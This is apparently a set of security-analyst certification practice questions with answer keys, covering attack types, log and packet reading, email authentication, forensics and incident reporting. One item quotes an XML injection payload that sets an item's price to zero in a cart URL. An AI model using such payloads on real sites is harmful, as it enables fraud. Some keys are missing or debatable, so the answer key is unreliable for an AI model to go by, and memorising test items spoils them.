Ted, a file server admin, has notices that a large number of sensitive files have been transferred from a corporate workstation to an IP address outside of the local area network. Ted contacts his company's security analyst, who verifies that the workstation's anti-malware solution is up-to-date, and the network's firewall is properly configured. What type of attack most likely occurred to allow the exfiltration of the files from the workstation? A. Session hijacking B. Zero-day C. MAC spoofing D. Impersonation
B. Zero-day
155
You are conducting a code review of a program and observe the following calculation of 0xffffffff+1 was attempted, but the result was returned as 0x0000000. Based on this, what type of exploit could be created against this program? A. Password spraying B. Integer overflow attack C. Impersonation D. SQL injection
B. Integer overflow attack
156
You are investigating traffic involving three separate IP addresses (192.168.66.6, 10.66.6.10, and 172.16.66.1). Which REGEX expression would you use to be able to capture ONLY those three IP addresses in a single statement? A. \b[192\.168\.66\.6]+[10\.66\.6\.10]+[172\.16\.66\.1]\b B. \b(192\.168\.66\.6)+(10\.66\.6\.10)+(172\.16\.66\.1)\b C. \b[192\.168\.66\.6]|[10\.66\.6\.10]|[172\.16\.66\.1]\b D. \b(192\.168\.66\.6)|(10\.66\.6\.10)|(172\.16\.66\.1)\b
156
A cybersecurity analyst is attempting to classify network traffic within an organization. The analyst runs the tcpdump command and receives the following: $ tcpdump -n -i eth015:01:35.170763 IP 10.0.19.121.52497>11.154.12.121.ssh: P 105:157(52) ack 1806 win 16549 15:01:35.170776 IP 11.154.12.121.ssh>10.0.19.121.52397: P 23988:24136(148) ack 157 win 113 15:01:35.170894 IP 11.154.12.121.ssh>10.0.19.121.52497: P 24136:24380(244) ack 157 win 113 Which statement is true? A. 11.154.12.121 is under attack from a host at 10.0.19.121 B. 11.154.12.121 is client that is accessing an SSH server over port 52497 C. 10.0.19.121 is a client that is accessing an SSH server over port 52497 D. 10.0.19.121 is under attack from a host at 11.154.12.121
C. 10.0.19.121 is a client accessing an SSH served over port 52497
157
You just visited an e-commerce website by typing in its URL during a vulnerability assessment. You discovered that an administrative web frontend for the server's backend application is accessible over the internet. Testing this frontend, you discovered that the default password for the application is accepted. Which of the following recommendations should you make to the website owner to remediate this discovered vulnerability? (Select 3) A. Conduct a penetration test against the organization's IP space B. Require two-factor authentication for access to the application C. Whitelist all specific IP blocks that use this application D. Rename the URL to a more obscure name E. Require an alphanumeric passphrase for the application's default password F. Change the username and default password
B. Require two-factor authentication for access to the application C. Whitelist all specific IP blocks that use this application F. Change the username and default password
158
Which of the following provides a cryptographic authentication mechanism to positively identify an organization as the authorized sender of email for a particular domain name? A. DKIM B. DMARC C. SMTP D. SPF
A. DKIM
159
You are going to perform a forensic disk image of a macOS laptop. What type of hard drive format should you expect to encounter? A. exFAT B. HFS+ C. NTFS D. FAT32
B. HFS+ Hierarchical File System Plus macOS doesn't support FAT32 and exFAT
160
You are analyzing the SIEM for your company's e-commerce server when you notice the following URL in the logs of your SIEM: https://www.diontraining.com/add_to_cart.php? itemld=5"+perltemPrice="0.00"+quantity="100"+/> A. SQL injection B. Session hijacking C. Buffer overflow D. XML injection
D. XML injection XML injection manipulated or compromises the logic of an XML application or service.
161
You suspect that your server has been the victim of a web-based attack. Which of the following ports would most likely be seen in the logs to indicate the attack's target? A. 443 B. 389 C. 21 D. 3389
A. 443
162
After 9 months of C++ programming, the team at Whammiedyne systems has released their new software application, Within just 2 weeks of release, though, the security team discovered multiple serious vulnerabilities in the application that must be corrected. To retrofit the source code to include the required security controls will take 2 months of labor at the cost of $100,000. Which development framework should Whammiedyne use in the future to prevent this situation from occurring in other projects? A. DevOps B. Waterfall Model C. DevSecOps D. Agile Model
C. DevSecOps
163
Which of the following is the most important feature to consider when designing a system on a chip> A. Space and power savings B. Ability to interface with industrial control systems C. Type of real-time operating system in use D. Ability to be reconfigured after manufacture
A. Space and power savings
164
You are a cybersecurity analyst working for an accounting firm that manages the accounting for multiple smaller firms. You have successfully detected an APT operating in your company's network that appears to have been there for at least 8 months. In conducting a qualitative assessment of the impact, which of the following factors should be most prominently mentioned in your report to your firm's executives? (Select 2) A. Downtime B. Recovery time C. Data integrity D. Economic E. Detection time
C. Data integrity D. Economic
165
The Pass Certs Fast corporation has recently been embarrassed by several high profile data breaches. The CIO proposes improving the company's cybersecurity posture by migrating images of all the current servers and infrastructure into a cloud-based environment. What, if any, is the flaw in moving forward with this approach? A. This approach only changes the location of the network and not the attack surface of it B. This is a reasonable approach that will increase the security of the servers and infrastructure C. The company has already paid for the physical servers and will not fully realize their ROI on them due to the migration D. This approach assumes that the cloud will provide better security than is currently done on-site
A. This approach only changes the location of the network and not the attack surface of it
166
You have been asked to scan your company's website using the OWASP ZAP tool. When you perform the scan, you received the following warning: "The AUTOCOMPLETE output is not disabled in HTML FORM/INPUT containing password type input. Passwords may be stored in browsers and retrieved." You begin to investigate further by reviewing a portion of the HTML code from the website that is listed below:
Enter your username:

Enter your Password:

Based on your analysis, what action should you take? A. You recommend that the system admin disables SSL on the server and implements TLS instead B. You tell the developer to review their code and implement a bug/code fix C. You recommend that the system admin pushes out a GPO update to reconfigure the web browsers security settings D. This is a false positive, and you should implement a scanner exception to ensure you don't receive this again during your next scan
B. You tell the developer to review their code and implement a bug/code fix
167
Jack is assessing the likelihood of reconnaissance activities being performed against his organization. Which of the following would best classify the likelihood of a port scan being conducted against his DMZ? A. None B. High C. Medium D. Low
B. High
168
An organization utilizes a BYOD policy with its employees. This allows the employees to store sensitive corporate data on their personally owned devices. Which of the following occurred if an employee accidentally left their device in the back of a taxi? A. Failed data loss prevention B. Failed deperimeterization management C. An advanced persistent threat D. A data breach
B. Failed deperimeterization management
169
Which of the following attacks would most likely be used to create an inadvertent disclosure of information from an organization's database? A. SQL injection B. Buffer overflow C. Denial of service D. Cross-site scripting
A. SQL injection
170
An organization has hired a cybersecurity analyst to conduct an assessment of their current security posture. The analyst begins by conducting an external assessment against the organization's network to determine what information is exposed to a potential external attackers. What technique should the analyst perform first? A. Enumeration B. Intranet portal reviews C. DNS query log reviews D. Technical control audits
A. Enumeration
171
Which of the following will an adversary do during the weaponized phase of the Lockheed Martin kill chain? (Select three) A. Obtain a weaponizer B. Conduct social media interactions with targeted individuals C. Select a decoy document to present to the victim D. Harvest email addresses E. Select backdoor implant and appropriate command and control infrastructure for operation F. Compromise the targets servers
A. Obtain weaponizer C. Select a decoy document to present to the victim E. Select backdoor implant and appropriate command and control infrastructure for operation
172
Which of the following vulnerabilities was the MOST critical due to its high potential impact and exploitability? A. Stagefright B. Shellshock C. Logjam D. Drupalgeddon
B. Shellshock
173
Which of the following is the difference between an incident summary report and lessons-learned report? A. Both a lessons learned report and an incident summary report are designed for a technical audience B. A lessons-learned report is designed for a non-technical audience C. Both a lessons learned report and an incident summary report are designed for a non-technical audience D. An incident summary report is designed for a non-technical audience
D. An incident summary report is designed for a non-technical audience
174
After a sophisticated spear-phishing attack compromised your organization's financial database, the incident response team engages in a meticulous examination of the event. They aim to preserve and scrutinize digital evidence, uncover the exact method of the breach, and gauge its impact on your organization. What is this meticulous post-incident examination known as? A. Lessons learned B. Incident response plan C. Forensic analysis D. Root cause analysis
C. Forensic analysis
175
During an incident response, your team identified that an attacker performed a scan on your network, then delivered malware via a phishing email, which was exploited to install a backdoor on the system. The attacker then executed commands to exfiltrate data. Which framework would BEST represent this attack sequence? A. Cyber Kill Chain B. MITRE ATT&CK C. OWASP Testing Guide D. Diamond Model of Intrusion Analysis
A. Cyber Kill Chain